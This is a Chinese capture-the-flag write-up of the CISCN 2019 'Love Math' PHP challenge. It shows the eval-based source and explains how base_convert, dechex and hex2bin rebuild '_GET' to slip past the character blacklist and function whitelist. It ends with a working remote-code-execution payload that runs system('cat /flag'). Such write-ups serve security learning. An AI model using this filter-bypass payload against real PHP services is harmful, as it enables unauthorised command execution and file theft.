无字符串RCE

来自：

[CISCN 2019 初赛]Love Math

源码审计

一打开就是源码

<?php
error_reporting(0);
//听说你很喜欢数学，不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
} 

wp大致思路来自博客：https://blog.csdn.net/shawdow_bug/article/details/125335284

分析一下：

首先是黑名单：单双引号(' ")、反引号(`)、中括号([ ])。

这里需要知道：

单双引号的禁用说明字符串是无法使用的，可以用返回值为字符串的函数返回。
反引号的禁用说明无法使用命令执行，
中括号是用来访问数组的元素，可以用花括号({})代替。

白名单是一系列的数学函数。首先在里面寻找能够返回字符串的函数，利用 PHP 手册迅速排查：

能够返回字符串的函数有：

base_convert：2到36进制之间的任意转换。
decbin：十进制转到二进制。
dechex：十进制转换为十六进制。
decoct：十进制转换为八进制。

这四个函数的描述如下：

（1）base_convert

（2）decbin

（3）dechex

（4）decoct

这里需要注意，base_convert 可以返回包含 a-z 的字符串，所以它能为我们提供任意一个函数的字符串名称，再利用 PHP 的动态调用函数特性（一个字符串加一个括号就能调用字符串指定的函数）来调用。

payload构造思路

首先因为黑名单的原因，直接的命令注入直接寄了，所以我们选择一种神奇的RCE构造，形如：

$_GET[1]($_GET[2])

里面套一个$_GET，我们就可以在里面这个get里再命令执行。

主要的问题是 "_GET" 是被限制的，所以接下来的思路是通过上面四个函数把它构造出来。

由于只能传入 79 个字符，只用 base_convert 来构造字符串就会发现构造出来的 payload 长度超过限制。所以，需要另辟途径。

payload无字符串构造

我们可以使用 hex2bin 将字符串的 16 进制形式转换成原始字符串，比如 0x5f474554 -> "_GET"。这个 hex2bin 不在白名单中，这可以用 base_convert 得到。

（为什么要用 hex2bin，而不是 decbin？）

把 "hex2bin" 看成 36 进制，然后转换成 10 进制：

echo base_convert('hex2bin',36,10);   // 37907361743

再倒过来，我们就得到了 "hex2bin"：

echo base_convert(37907361743,10,36);    // hex2bin

接下来要考虑的是hex2bin 需要接收 "_GET" 的十六进制，即 5f474554：

echo bin2hex("_GET");      // 5f474554
echo hex2bin("5f474554");  // _GET

5f474554 以字符串类型传入，它必须由整型数字转换得到，可以用 dechex 函数：

echo hexdec("5f474554");        // 1598506324，整型
echo dechex(1598506324);        // 5f474554，字符串

整个思路串起来( 看每个推演的下一行就能轻松得到 )：

echo base_convert(37907361743,10,36)(dechex(1598506324))  //_GET

首先是因为单双引号的禁用，所以我们要用某个函数返回目标字符串（即"_GET"），而这个函数必须接收"_GET"的其他数据格式，例如整型数字。类似：

func($number) --> "_GET"

但没有符合这样条件的函数，所以考虑能将某种进制的数字字符串转换成特定字符串的函数，类似：

func1(func2($number))
相当于
$func2($number)         整型数字 --> 某种进制的数字字符串
$func1($number_string)  某种进制的数字字符串 --> 特定字符串

这样来看，符合条件的函数是 hex2bin()，因为 hex2bin() 接收的十六进制数字字符串（"5f474554"）可以由整型数字（1598506324）通过 dechex() 函数转换得到，而 hex2bin() 返回一个特定的字符串。

payload

/?c=1;${1}=base_convert(37907361743,10,36)(dechex(1598506324));$${1}{2}($${1}{3})&2=system&3=cat /flag

最后总结

有几个技巧可以构造能得到任意字符串的无字符串实参 payload：

• hex2bin 和 dechex 两个函数配合
• base_convert 函数